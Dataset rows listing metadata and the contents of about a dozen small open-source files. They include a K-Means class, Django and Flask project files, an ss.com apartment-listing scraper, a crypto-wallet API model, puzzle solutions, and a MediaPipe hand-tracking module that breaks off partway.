blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e17f033e366c7e31b684c3adb569d7875da9a652 | 2d9d7637a3a97dd719a7001a2ee7778682c353ac | /K-Means/kmeans.py | b129eff42836cc0136c811b48221b33149222aaf | [] | no_license | sontallive/MachineLearningCodes | cff0906f9d8ca4acf68dfefbb5e2fcbfc5b39515 | 639fa6bbd98df2480769eec20de703b95c3b4e41 | refs/heads/master | 2020-09-04T14:23:21.041159 | 2019-11-24T06:37:35 | 2019-11-24T06:37:35 | 219,755,080 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,720 | py | import numpy as np
import time
class KMeans:
    """Plain K-Means clustering using the L1 (Manhattan) distance.

    Attributes:
        data:      (n_samples, n_features) array of points to cluster.
        centroids: (k, n_features) array holding the current cluster centers.
        labels:    (n_samples,) array; labels[i] is the cluster index of point i.
    """
    def __init__(self,data,k,iter_num = 50):
        """Pick k distinct random rows of `data` as the initial centroids.

        Args:
            data: 2-D array of shape (n_samples, n_features).
            k: number of clusters; must be <= n_samples.
            iter_num: maximum number of update iterations for run().
        """
        self.data = data
        self.length = data.shape[0]
        self.k = k
        choice = np.random.choice(a=self.length, size=self.k, replace=False)
        # astype(float) keeps centroid updates exact even for integer input:
        # assigning a float mean into an int array would silently truncate.
        self.centroids = self.data[choice].astype(float)
        self.labels = np.zeros(self.length)
        self.MAX_ITER_NUM = iter_num
    def compute_centroids(self):
        """Move every centroid to the mean of the points assigned to it."""
        for i in range(self.k):
            ids = (self.labels == i)
            if not ids.any():
                # Empty cluster: np.mean over zero rows would produce NaN and
                # poison every later iteration, so keep the previous centroid.
                continue
            self.centroids[i,:] = np.mean(self.data[ids], 0)
    def update_label(self):
        """Assign each point to the centroid with the smallest L1 distance."""
        tick = time.time()
        for i in range(self.length):
            dist = np.sum(np.abs(self.data[i,:] - self.centroids),axis = 1)
            self.labels[i] = np.argmin(dist)
        print('time used:%ds' % int(time.time() - tick))
    def run(self):
        """Alternate label/centroid updates until convergence or MAX_ITER_NUM.

        Convergence is declared when the mean absolute centroid movement of
        one iteration drops below 0.01.
        """
        for i in range(self.MAX_ITER_NUM):
            last_centroids = self.centroids.copy()
            print('K-Means iteration %d/%d..' % (i+1,self.MAX_ITER_NUM))
            self.update_label()
            self.compute_centroids()
            move_step = np.mean(np.abs(last_centroids-self.centroids))
            if move_step < 0.01 :
                print("didn't change... leave iteration...")
                break
            print('move step:',move_step)
if __name__ == "__main__":
    # Demo: cluster 100 random 128-dimensional points into 20 clusters.
    sample = np.random.randn(100, 128)
    print(sample.shape)
    clusterer = KMeans(sample, 20, iter_num=50)
    clusterer.run()
    print(clusterer.labels)
| [
"418773551@qq.com"
] | 418773551@qq.com |
3268b47046c0b86ad8023be1ca8423eb73216617 | d04703db63a75a2edc4e0df718d4351570175686 | /main/migrations/0002_auto_20210528_2218.py | ce0aa21d7462538ee4feee545e427604a9201cb9 | [] | no_license | Asliddin7501/new-lms | dfbdb377cacc48adc687298583549f5f21c2f327 | ebd227a5fa606b7e53e6853cf4025aa401b3c471 | refs/heads/main | 2023-06-04T23:20:17.776429 | 2021-06-09T03:13:08 | 2021-06-09T03:13:08 | 369,425,365 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 842 | py | # Generated by Django 3.2.3 on 2021-05-28 22:18
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration: set human-readable verbose names for the
    Sohalar and TashkilotTurlari models and relax the self-referencing
    `asosiy_soha` foreign key (nullable, RESTRICT on delete)."""
    dependencies = [
        ('main', '0001_initial'),
    ]
    operations = [
        migrations.AlterModelOptions(
            name='sohalar',
            options={'verbose_name': 'Soha', 'verbose_name_plural': 'Sohalar'},
        ),
        migrations.AlterModelOptions(
            name='tashkilotturlari',
            options={'verbose_name': 'Tashkilot turi', 'verbose_name_plural': 'Tashkilot turlari'},
        ),
        migrations.AlterField(
            model_name='sohalar',
            name='asosiy_soha',
            # Self-referencing FK to the parent field of study; optional.
            field=models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.RESTRICT, to='main.sohalar'),
        ),
    ]
| [
"mahmudovasliddin750@gmail.com"
] | mahmudovasliddin750@gmail.com |
4670e76275637a85fcd420befc67f86afc9b748b | cdf57c3783db3b9544abcad1f22d9028d4935a7a | /sska/Version control/otra iteracija/zupinj.py | 3206c89b0ea4e6f32c75a89a157a34cc3ef6b4db | [] | no_license | ntech2/sska-scraapee | 24a5f1c91e0b353defbf5d9bfc3d299b0e0b97f3 | bb75358790f9c6c501faab841eabbc9d5a02d234 | refs/heads/master | 2021-04-06T08:45:07.805245 | 2018-03-08T21:27:53 | 2018-03-08T21:27:53 | 124,449,454 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,288 | py | # https://www.youtube.com/watch?v=XQgXKtPSzUI 9.11.2017 dzivoklu cena/kvm/riga projekts
from urllib.request import urlopen as uReq
from bs4 import BeautifulSoup as soup
import re
import csv
# Target page to download (scrapes ss.com flat listings for Riga).
#my_url= 'https://www.ss.com/lv/real-estate/flats/riga/all/'
my_url= 'https://www.ss.com/lv/real-estate/flats/riga/all/hand_over/page99.html'
# Open a connection to the page and download the raw HTML.
uClient = uReq(my_url)
# Keep the entire downloaded content in page_html.
page_html = uClient.read()
# Close the connection.
uClient.close()
# Parse the HTML and keep the result as page_soup.
page_soup = soup(page_html, "html.parser")
# Grab the flat listing rows. TODO: revisit later - not sure matching row
# ids against the regex 'tr_4.*' is the right selector.
containers = page_soup.findAll("tr",{"id": re.compile('tr_4.*')})
# Write the output CSV file.
filename = "ssflats.csv"
f = open(filename, "w")
headers = "Link, Pic, Address, Rooms, Sqrm, Floor, Type, Price\n"
#headers = "Link, Pic, Text, Address, Rooms, Sqrm, Floor, Type, Price\n"  # variant with the text column did not work
f.write(headers)
# Loop over every listing row on the current page.
for container in containers:
    con_link = container.a["href"]
    con_pic = container.img["src"]
    con_txt = container.div.a.text.strip()
    title_container = container.findAll("td",{"class" : 'msga2-o pp6'})
    # TODO: in field 0, figure out how to split out the district separately,
    # because there is a <br> tag in the middle of it.
    con_addr = title_container[0].text.strip()
    con_rooms = title_container[1].text.strip()
    con_sqrm = title_container[2].text.strip()
    con_floor = title_container[3].text.strip()
    con_type = title_container[4].text.strip()
    con_monet = title_container[5].text.strip()
    # Debug prints to verify the parsed fields.
    #print("con_link: " + con_link)
    #print("con_pic: " + con_pic)
    #print("con_txt: " + con_txt)
    #print("con_addr: " + con_addr)
    #print("con_rooms: " + con_rooms)
    #print("con_sqrm: " + con_sqrm)
    #print("con_floor: " + con_floor)
    #print("con_type: " + con_type)
    #print("con_monet: " + con_monet)
    # One CSV row per listing; ".th2." -> ".800." swaps the thumbnail for the
    # full-size picture URL, and embedded commas are replaced to keep the CSV valid.
    f.write ("http://ss.com" + con_link + "," + con_pic.replace(".th2.", ".800.") + "," + con_addr.replace(",", ".") + "," + con_rooms.replace(",", ".") + "," + con_sqrm + "," + con_floor + "," + con_type.replace(",", ".") + "," + con_monet.replace(",", "") + "\n")
print("Donezo!")
f.close() | [
"ntech@inbox.lv"
] | ntech@inbox.lv |
0b142f823a12e645d0baba27b37f30d910b1b5fa | 9582341887537c413479f95128f9c9f8df28e317 | /sampledbapp/utils.py | d2a2ca8919eb8d0725cae82c69fa9caa1270476f | [
"Apache-2.0"
] | permissive | csmsoftware/SampleDB | 59e3bfe9cbb579dafe90ad52d364faffb4fc1f4a | 3d82cf98dd37c632b47594b2079bfa9922b21115 | refs/heads/master | 2023-04-08T07:31:14.222665 | 2023-03-22T13:12:07 | 2023-03-22T13:12:07 | 126,981,893 | 0 | 0 | Apache-2.0 | 2021-11-19T09:30:19 | 2018-03-27T12:20:05 | HTML | UTF-8 | Python | false | false | 768 | py | import os
from django.contrib.auth.models import Group
# Recursively check filename and add the iterator to the end.
def build_and_check_file_name(folder_path,iterator,file_name):
    """Return a file name that does not collide with an existing file in
    `folder_path`.

    Starting from `file_name` itself, the first free variant among
    "name.ext", "name[1].ext", "name[2].ext", ... is returned (recursing
    with an increasing `iterator`).  Only the name is returned, not the path.

    Fixes two defects of the previous version: the existence check now tests
    the same candidate name that gets returned (it used to test
    "name.ext[n]" but return "name[n].ext", so collisions could slip
    through), and names without an extension no longer raise IndexError
    (os.path.splitext replaces the naive split on '.').
    """
    if iterator == 0:
        candidate = file_name
    else:
        root, ext = os.path.splitext(file_name)
        candidate = root + "[" + str(iterator) + "]" + ext
    full_path = os.path.join(folder_path, candidate)
    # Candidate already taken: try the next suffix number.
    if os.path.isfile(full_path):
        return build_and_check_file_name(folder_path, iterator + 1, file_name)
    return candidate
| [
"g.haggart@imperial.ac.uk"
] | g.haggart@imperial.ac.uk |
7c9b2abd31a7a2086a079b6bda70792712a6fc83 | a24ce66b03b8018bc6f0310c6213f45a0f6736ae | /studentinfo/settings.py | b2b99241129f22ae53b5f95b7609e4c0e165baf6 | [] | no_license | Sabbirdiu/StudentInformation | 67314cf833d017aa9371b7096235a34d3add186b | b79313bb851519024e6a69de34331c4bfa34ae63 | refs/heads/main | 2023-07-19T03:35:23.398207 | 2021-09-08T13:05:52 | 2021-09-08T13:05:52 | 403,605,266 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,441 | py | """
Django settings for studentinfo project.
Generated by 'django-admin startproject' using Django 3.2.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): a real secret key is committed to source control here; move
# it into an environment variable before deploying this project anywhere.
SECRET_KEY = 'django-insecure-w(t9)4-=bltjrpq_@#w@bsxx^&!$9c2ulj7h^#i@cg21obm4*7'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Empty is acceptable while DEBUG is True; production needs explicit hosts.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    # local
    'student.apps.StudentConfig',
    # 3rd party
    'crispy_forms',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'studentinfo.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        # Project-level templates live in <repo>/templates; app templates are
        # discovered automatically via APP_DIRS.
        'DIRS': [BASE_DIR /'templates'],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'studentinfo.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': BASE_DIR / 'db.sqlite3',
    }
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
# Auth flow: redirect to the 'home' URL name after login; 'login' is the
# named URL of the login view.
LOGIN_REDIRECT_URL = 'home'
LOGIN_URL = 'login'
CRISPY_TEMPLATE_PACK = 'bootstrap4' | [
"sabbir.s.dk7@gmail.com"
] | sabbir.s.dk7@gmail.com |
12decf3b44d77f6ad648e90676bdb40d42a7c65b | 0fc2b11f52085b584bc52f4982c297dd2c03e8b2 | /DSC/DP_7_15/1254_yonghun.py | 0c75aa57ebee208bc3a988590862ee28f66fbc95 | [] | no_license | yw9142/Solving-algorithmic-problems | ec9cdb23492ec10e494937f6f221d54d8987be3d | d78b2d518608bd89b463a0e8da1ca30e1dddaec3 | refs/heads/master | 2023-01-10T06:52:55.938545 | 2020-11-10T16:09:05 | 2020-11-10T16:09:05 | 277,123,609 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 876 | py | # -*- encoding: utf-8 -*-
def palindrome(index, length, str): # Palindrome 확인 함수
i = 0
while index + i < length - i - 1:
if str[index + i] != str[length - i - 1]: # palindrome은 i == N - i - 1 이면 성립함.
return False # 하나라도 성립하지 않는다면 return False
i += 1
return True # 모두 성립한다면 return True
if __name__ == '__main__':
    text = input()
    n = len(text)
    result = 0
    # Smallest i whose suffix text[i:] is a palindrome: mirroring the first
    # i characters onto the end then gives a palindrome of length n + i.
    for start in range(n):
        if palindrome(start, n, text):
            result = n + start
            break
    print(result)
# Manacher's algorithm :
# https://algospot.com/wiki/read/Manacher's_algorithm
# http://www.secmem.org/blog/2019/03/10/Manacher/
| [
"yw9142@gmail.com"
] | yw9142@gmail.com |
ee97aa1b68604354d9d46457899de563a5531c20 | 5146fcb6117be400eaced506e7b0800309b02953 | /manage.py | 06c63c49c1128bd5fc953cc4db9ecad41abffd1f | [] | no_license | CarpenterChuk/myawesomeblog-project | 4d83460c4746ad2cbd4697f61553278b8e2a9283 | 820f90b451f0be2d8c8ba0ccb9cabe89ecedb88b | refs/heads/main | 2023-03-04T10:42:30.665614 | 2021-02-08T20:58:59 | 2021-02-08T20:58:59 | 336,229,769 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 669 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Run administrative tasks."""
    # Point Django at this project's settings module before anything tries
    # to import them (only sets it if the caller has not already).
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'myawesomeblog.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        raise ImportError(
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        ) from exc
    # Dispatch to the management subcommand given on the command line
    # (runserver, migrate, createsuperuser, ...).
    execute_from_command_line(sys.argv)
if __name__ == '__main__':
    main()
| [
"stoliarchuk.vlad@gmail.com"
] | stoliarchuk.vlad@gmail.com |
b12c9631dbd2f75d27a5ac4754fee8e016fc58c0 | 60acb606318869410d7437bf6c1a16fd6762b6b4 | /app/__init__.py | 871f9dabd9b8272d79ccffa706296dcf48f3ee49 | [
"Apache-2.0"
] | permissive | heraclitusj/mgek_imgbed | 8fb0c69599fab3fce06684f659dfd5c0b4c5f866 | d8a77ba1401f42237adda1b3ea8611f6464a704e | refs/heads/master | 2022-07-28T01:48:51.314094 | 2020-05-20T05:35:52 | 2020-05-20T05:35:52 | 265,461,338 | 0 | 0 | null | 2020-05-20T05:31:37 | 2020-05-20T05:31:37 | null | UTF-8 | Python | false | false | 1,231 | py | # @Author: Landers1037
# @Github: github.com/landers1037
# @File: __init__.py.py
# @Date: 2020-05-12
from flask import Flask
from app.config import *
from flask_sqlalchemy import SQLAlchemy
from flask_pymongo import PyMongo
# On import a handle for each backend is created up front; which one is
# actually initialised is chosen later from the configured `engine` value.
db = SQLAlchemy()
mongo = PyMongo()
global_config = None
def create_app(mode=None):
    """Application factory: build and configure the Flask image-bed app.

    :param mode: 'dev' forces debug mode regardless of the config file.
    :return: the configured Flask application with all blueprints registered.
    """
    application = Flask(__name__, static_url_path='/images', static_folder='../images')
    check_config()
    global global_config
    global_config = read_config()
    if mode == 'dev' or global_config.debug:
        application.debug = True
    application.config.from_object(flask_config())
    # TODO: add error handling around the database connection setup.
    if global_config.engine == 'sqlite':
        db.init_app(application)
    elif global_config.engine == 'mongo':
        mongo.init_app(application)
    else:
        # Unknown engine value: fall back to the SQLAlchemy (sqlite) backend.
        db.init_app(application)
    from .api.img import img
    from .api.auth import auth
    from .api.sys import sys
    application.register_blueprint(img)
    application.register_blueprint(auth)
    application.register_blueprint(sys)
    return application
| [
"32225052+Landers1037@users.noreply.github.com"
] | 32225052+Landers1037@users.noreply.github.com |
83e0f265d472c41c7a3a012032294e7118cc9456 | 75dc7b84c304da00bd0a06146bf1b8cd50de291c | /convert_txt_to_csv/decode3.py | 995058492deafc50567e3555b449eeae27ecaee4 | [] | no_license | salevizo/flinkcep | c7f4ddbef58a41f644badec440ef46d4eb5e4fd2 | 665a63c91406e6477278310a52efd9d96eaa1873 | refs/heads/master | 2020-04-05T13:53:26.158412 | 2019-02-04T23:20:45 | 2019-02-04T23:20:45 | 156,914,199 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,096 | py |
#!/usr/bin/python
import re
import csv
import sys
def main(argv):
    """Convert a FlinkCEP "Suspicious RendezVous" text report into a CSV.

    Each report line describes two vessels; it is emitted as two CSV rows
    (one per vessel). NOTE: `argv` is accepted but unused - the input path
    is read from sys.argv[1] directly. Written for Python 2 (print
    statements, csv file opened in 'wb').
    """
    lines=[]
    path=sys.argv[1]
    fh = open(path)
    #0-vessel1:227705102, 1-vessel2:227574020 , 2-Gap_End_1:1457645565 , 3-Gap_End_2:1457647184, 4-gbsg1x, 5-lon1:48.38216 , 6-lat1:-4.4970617, 7-lon2:48.3797 , 8-Lat2 : -4.4974666
    # Strip the textual field labels so only comma-separated values remain;
    # separator lines containing "--" are skipped.
    for line in fh:
        if "--" not in line:
            line_=line.replace("Suspicious RendezVous : { Vessel_1 :", "")
            line_=line_.replace("Vessel_2 :", "")
            line_=line_.replace("Gap_End_1 :", "")
            line_=line_.replace("Gap_End_2 :", "")
            line_=line_.replace("GeoHash :", "")
            line_=line_.replace("Lon1 :", "")
            line_=line_.replace("Lat1 :", "")
            line_=line_.replace("Lon2 : ", "")
            line_=line_.replace("Lat2 : ", "")
            line_=line_.replace("}", "")
            l=line_.split(",")
            lines.append(l)
    fh.close()
    # Output file name: input basename with a .csv extension.
    name=path.split('/')
    name_csv=name[-1].split('.')
    name_csv=name_csv[0] + '.csv'
    mmsis=[]
    with open(name_csv, 'wb') as f: # Just use 'w' mode in 3.x
        for i in range(len(lines)) :
            # NOTE(review): csv.writer's second positional argument is a
            # dialect, not a field-name list, and the writer is re-created on
            # every iteration - verify this against a run that produced the
            # expected output.
            w = csv.writer(f, ['mmsi', 'lon', 'lat', 'geohash','gap_end'])
            text=[]
            text.append(lines[i][0]) #mmsi
            text.append(lines[i][5]) #lon
            text.append(lines[i][6]) #lat
            text.append(lines[i][4]) #geohash
            text.append(lines[i][2]) #gapend
            w.writerow(text)
            text=[]
            text.append(lines[i][1]) #mmsi
            text.append(lines[i][7]) #lon
            text.append(lines[i][8]) #lat
            text.append(lines[i][4]) #geohash
            text.append(lines[i][3]) #gapend
            w.writerow(text)
            mmsis.append(lines[i][0])
            mmsis.append(lines[i][1])
    # Report the distinct vessel ids and row counts.
    mmsis=set(mmsis)
    print "mmsis are:" + str(mmsis)
    print len(mmsis)
    print len(lines)*2
    #x=lon, y=lat
if __name__ == "__main__":
    main(sys.argv[1:])
| [
"alev.sophia@gmail.com"
] | alev.sophia@gmail.com |
6cde627ded6c2d6491fdad4fb0d017931b35ce14 | bdae068f43cdf79c6253990ad0465ef0dc47acc5 | /mainnet/models/serialized_wallet.py | 73f734efbde4327b822405126a2502710f4b9f8a | [] | no_license | mainnet-pat/mainnet-python-generated | 158f29cfa979e936bfa88bf5357a9a7bc84a89cc | 35673f76bc5a90185ef44536b077ab9c173beee3 | refs/heads/master | 2023-01-14T03:42:39.405647 | 2020-11-18T13:39:38 | 2020-11-18T13:39:38 | 313,901,083 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,211 | py | # coding: utf-8
"""
Mainnet Cash
A developer friendly bitcoin cash wallet api This API is currently in active development, breaking changes may be made prior to official release of version 1. **Important:** This library is in active development # noqa: E501
The version of the OpenAPI document: 0.0.2
Contact: hello@mainnet.cash
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from mainnet.configuration import Configuration
class SerializedWallet(object):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech
    Do not edit the class manually.
    """
    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    openapi_types = {
        'wallet_id': 'str'
    }
    attribute_map = {
        'wallet_id': 'walletId'
    }
    # Empty map: no discriminated subclasses are generated for this model, so
    # get_real_child_model() will always return None.
    discriminator_value_class_map = {
    }
    def __init__(self, wallet_id=None, local_vars_configuration=None):  # noqa: E501
        """SerializedWallet - a model defined in OpenAPI"""  # noqa: E501
        if local_vars_configuration is None:
            local_vars_configuration = Configuration()
        self.local_vars_configuration = local_vars_configuration
        self._wallet_id = None
        self.discriminator = 'wallet_id'
        self.wallet_id = wallet_id
    @property
    def wallet_id(self):
        """Gets the wallet_id of this SerializedWallet.  # noqa: E501

        ID that is returned in `wallet` field of /wallet call  # noqa: E501

        :return: The wallet_id of this SerializedWallet.  # noqa: E501
        :rtype: str
        """
        return self._wallet_id
    @wallet_id.setter
    def wallet_id(self, wallet_id):
        """Sets the wallet_id of this SerializedWallet.

        ID that is returned in `wallet` field of /wallet call  # noqa: E501

        :param wallet_id: The wallet_id of this SerializedWallet.  # noqa: E501
        :type wallet_id: str
        """
        # wallet_id is a required field; reject None when client-side
        # validation is enabled in the configuration.
        if self.local_vars_configuration.client_side_validation and wallet_id is None:  # noqa: E501
            raise ValueError("Invalid value for `wallet_id`, must not be `None`")  # noqa: E501
        self._wallet_id = wallet_id
    def get_real_child_model(self, data):
        """Returns the real base class specified by the discriminator"""
        discriminator_key = self.attribute_map[self.discriminator]
        discriminator_value = data[discriminator_key]
        return self.discriminator_value_class_map.get(discriminator_value)
    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        return result
    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())
    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()
    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, SerializedWallet):
            return False
        return self.to_dict() == other.to_dict()
    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        if not isinstance(other, SerializedWallet):
            return True
        return self.to_dict() != other.to_dict()
| [
"hello@mainnet.cash"
] | hello@mainnet.cash |
ca55231bed72276df46a7e9b1d23e67ae3171425 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/verbs/_fade.py | 48b2ce0cd12e383a309567bd8721b04aafb27dd9 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 337 | py |
#calss header
class _FADE():
def __init__(self,):
self.name = "FADE"
self.definitions = [u'to (cause to) lose colour, brightness, or strength gradually: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'verbs'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
fa0b0e8390377d9b563df54e6bfa61219bfd4b70 | ad0857eaba945c75e705594a53c40dbdd40467fe | /baekjoon/python/buying_cards_11052.py | b29c863cc46b83674f4b81cdf48a7cffc84bb63f | [
"MIT"
] | permissive | yskang/AlgorithmPractice | c9964d463fbd0d61edce5ba8b45767785b0b5e17 | 3efa96710e97c8740d6fef69e4afe7a23bfca05f | refs/heads/master | 2023-05-25T13:51:11.165687 | 2023-05-19T07:42:56 | 2023-05-19T07:42:56 | 67,045,852 | 0 | 0 | null | 2021-06-20T02:42:27 | 2016-08-31T14:40:10 | Python | UTF-8 | Python | false | false | 630 | py | # Title: 카드 구매하기
# Link: https://www.acmicpc.net/problem/11052
import sys
sys.setrecursionlimit(10 ** 6)
# One-line stdin helpers: read a single int / a line of space-separated ints.
read_single_int = lambda: int(sys.stdin.readline().strip())
read_list_int = lambda: list(map(int, sys.stdin.readline().strip().split(' ')))
def solution(num_card: int, packs: list):
    """Maximum total price obtainable when buying exactly num_card cards.

    packs[s-1] is the price of the pack containing s cards.  Bottom-up DP:
    best[c] = max over pack sizes s <= c of best[c - s] + packs[s - 1].
    """
    best = [0] * (num_card + 1)
    for count in range(1, num_card + 1):
        best[count] = max(best[count - size] + packs[size - 1]
                          for size in range(1, count + 1))
    return best[num_card]
def main():
    """Read the problem input from stdin and print the answer."""
    # Input format: first line N, second line the N pack prices.
    n = read_single_int()
    prices = read_list_int()
    print(solution(n, prices))
if __name__ == '__main__':
    main()
"yongsung.kang@gmail.com"
] | yongsung.kang@gmail.com |
153066306d9da80ea24c5bcd251efb27dd8b50e2 | 9b3a290bac71bca52091ef62917ac1bff5de2e08 | /HandTrackingModule.py | f0d10e3bd2d0cf58969bf477ae01e194b24c5f89 | [] | no_license | Badalmishra/mediapipe | e5343ff4c5b368fa29e36c68b905b5a004943310 | a38c0f73bd79d4f91920a58b684e8e70dd261af9 | refs/heads/main | 2023-06-09T06:28:10.740227 | 2021-06-27T07:29:46 | 2021-06-27T07:29:46 | 380,678,134 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,614 | py | import cv2
import mediapipe as mp
import time
import math
class handDetector():
    """Convenience wrapper around MediaPipe Hands: detects hand landmarks in
    BGR OpenCV frames and derives simple per-finger information."""
    def __init__(self, mode=False, maxHands=2, detectionCon=0.5, trackCon=0.5):
        """Configure the MediaPipe Hands solution.

        :param mode: static-image-mode flag, passed straight to MediaPipe.
        :param maxHands: maximum number of hands to track.
        :param detectionCon: minimum detection confidence.
        :param trackCon: minimum tracking confidence.
        """
        self.mode = mode
        self.maxHands = maxHands
        self.detectionCon = detectionCon
        self.trackCon = trackCon
        self.mpHands = mp.solutions.hands
        self.hands = self.mpHands.Hands(self.mode, self.maxHands,
                                        self.detectionCon, self.trackCon)
        self.mpDraw = mp.solutions.drawing_utils
        # Landmark ids of the five fingertips (thumb, index, middle, ring, pinky).
        self.tipIds = [4, 8, 12, 16, 20]
    def findHands(self, img, draw=True):
        """Run hand detection on a BGR frame and optionally draw the skeleton.

        Stores the raw MediaPipe results on self.results for the other
        methods and returns the (possibly annotated) frame.
        """
        imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
        self.results = self.hands.process(imgRGB)
        # print(results.multi_hand_landmarks)
        if self.results.multi_hand_landmarks:
            for handLms in self.results.multi_hand_landmarks:
                if draw:
                    self.mpDraw.draw_landmarks(img, handLms, self.mpHands.HAND_CONNECTIONS)
        return img
    def findPosition(self, img, handNo=0, draw=True):
        """Convert the landmarks of hand #handNo into pixel coordinates.

        Must be called after findHands (it reads self.results).  Returns a
        (lmList, bbox) tuple: lmList is [[id, x_px, y_px], ...] and bbox is
        (xmin, ymin, xmax, ymax); both are empty when no hand was detected.
        """
        xList = []
        yList = []
        bbox = []
        self.lmList = []
        if self.results.multi_hand_landmarks:
            myHand = self.results.multi_hand_landmarks[handNo]
            for id, lm in enumerate(myHand.landmark):
                # print(id, lm)
                # MediaPipe coordinates are normalized; scale by frame size.
                h, w, c = img.shape
                cx, cy = int(lm.x * w), int(lm.y * h)
                xList.append(cx)
                yList.append(cy)
                # print(id, cx, cy)
